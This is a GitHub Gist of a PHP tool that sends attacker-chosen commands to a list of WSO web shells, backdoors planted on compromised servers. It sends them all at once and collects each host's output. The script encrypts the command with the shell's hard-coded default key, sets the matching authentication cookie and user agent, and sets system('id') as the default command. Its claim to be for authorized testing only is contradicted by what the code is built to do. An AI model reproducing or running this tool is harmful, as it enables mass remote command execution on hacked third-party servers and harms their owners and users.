Last active
September 18, 2022 19:31
-
-
Save DamaneDz/f41ef7c340daa8d47ca54b7ce4d1e3f8 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
Mass COMMAND EXCUTER For WSO Shell 4.*.* | |
Modified and Made on 26/06/2019 By DamaneDz | |
This Script used for authorized testing and/or educational purposes only. | |
Run it on your own localhost or your server. | |
I take no responsibility for the abuse of the script. | |
Notes: | |
* DON't CHANGE THE USER AGENT VALUE. | |
* DON'T CHANGE THIS VALUE: 130a06df177c97a2e2b12b5a17719ce1. | |
*/ | |
// This function was written line by line ! | |
function encrypt_x($str,$pwd){ | |
$pwd=base64_encode($pwd); | |
$str=base64_encode($str); | |
$enc_chr=""; | |
$enc_str=""; | |
$i=0; | |
while($i<strlen($str)){ | |
for($j=0;$j<strlen($pwd);$j++){ | |
$enc_chr=chr(ord($str[$i])^ord($pwd[$j])); | |
$enc_str.=$enc_chr; | |
$i++; | |
if($i>=strlen($str))break; | |
} | |
} | |
return base64_encode($enc_str); | |
} | |
// This function has no role in this script ! | |
function decrypt($str,$pwd){ | |
$pwd=base64_encode($pwd); | |
$str=base64_decode($str); | |
$enc_chr=""; | |
$enc_str=""; | |
$i=0; | |
while($i<strlen($str)){ | |
for($j=0;$j<strlen($pwd);$j++){ | |
$enc_chr=chr(ord($str[$i])^ord($pwd[$j])); | |
$enc_str.=$enc_chr; | |
$i++; | |
if($i>=strlen($str))break; | |
} | |
} | |
return base64_decode($enc_str); | |
} | |
function curl($url,$eval){ | |
$host=parse_url($url); | |
$md5host=md5($host['host']); | |
$p1_encrypted= encrypt_x($eval,"130a06df177c97a2e2b12b5a17719ce1"); | |
$paramsPost = array("a"=>"GBMlAA==","p1"=>"{$p1_encrypted}","charset"=>"UTF-8","p2"=>"","c"=>"AWcfAzoXeQ8=","p3"=>"","ajax"=>"true",); | |
$ch=curl_init(); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
curl_setopt($ch, CURLOPT_HEADER, 0); | |
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"); | |
curl_setopt($ch, CURLOPT_URL, $url); | |
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); | |
curl_setopt($ch, CURLOPT_COOKIE, "{$md5host}key=130a06df177c97a2e2b12b5a17719ce1"); | |
curl_setopt($ch, CURLOPT_POSTFIELDS, $paramsPost); | |
curl_setopt($ch, CURLOPT_TIMEOUT, 30); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
$f = curl_exec($ch); | |
preg_match("#innerHTML='(.*?)';#i",$f,$x); | |
return array($host['host'], $x[1]); | |
curl_close($ch); | |
} | |
print '<center><form method="POST"> | |
<p><span style="font-size: 20pt"><font color="#c41013">WSO Shell</font> Command Excuter</span></p> | |
<p>Shells (<font color="#c41013">That you want to run command from it !</font>)<br><textarea rows="22" name="shells" cols="48">'.$shells.'</textarea></p> | |
<p><font color="#c41013">Command: </font><br><input type="text" value="system(\'id\');" name="cmd"></p> | |
<p><input type="submit" value="Excute" name="exec"></p> | |
</form></center>'; | |
if(isset($_POST["exec"])){ | |
foreach(explode("\n",$_POST['shells']) as $shell){ | |
$result = curl(trim($shell),trim($_POST['cmd'])); | |
$result= str_replace(array('\n','\r'),array("<br>","") , $result); | |
if(!empty($result[0]) && !empty($result[1])){ | |
print "THE HOST: ".$result[0]."<br>"; | |
print "THE EXEC RESULT: ".$result[1]."<br>"; | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment